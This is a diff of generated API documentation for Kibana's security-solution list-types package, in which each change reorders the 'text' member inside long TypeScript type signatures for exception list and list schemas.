-40,7 +40,7 @@ "label": "schema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, @@ -58,7 +58,7 @@ "label": "validateComments", "description": [], "signature": [ - "(item: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" + "(item: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, @@ -71,7 +71,7 @@ "label": "item", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, @@ -153,7 +153,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/typescript_types/index.ts", "deprecated": false @@ -1216,7 +1216,7 @@ "label": "listItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/typescript_types/index.ts", "deprecated": false @@ -1307,7 +1307,7 @@ "label": "exceptions", "description": [], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/typescript_types/index.ts", "deprecated": false @@ -1897,7 +1897,7 @@ "label": "CreateEndpointListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"os_types\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"os_types\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_endpoint_list_item_schema/index.ts", "deprecated": false, @@ -1925,7 +1925,7 @@ "label": "CreateExceptionListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_exception_list_item_schema/index.ts", "deprecated": false, @@ -1939,7 +1939,7 @@ "label": "CreateExceptionListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_exception_list_item_schema/index.ts", "deprecated": false, @@ -2009,7 +2009,7 @@ "label": "CreateListSchema", "description": [], "signature": [ - "{ description: string; name: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; } & { deserializer?: string | undefined; id?: string | undefined; meta?: object | undefined; serializer?: string | undefined; version?: number | undefined; }" + "{ description: string; name: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | 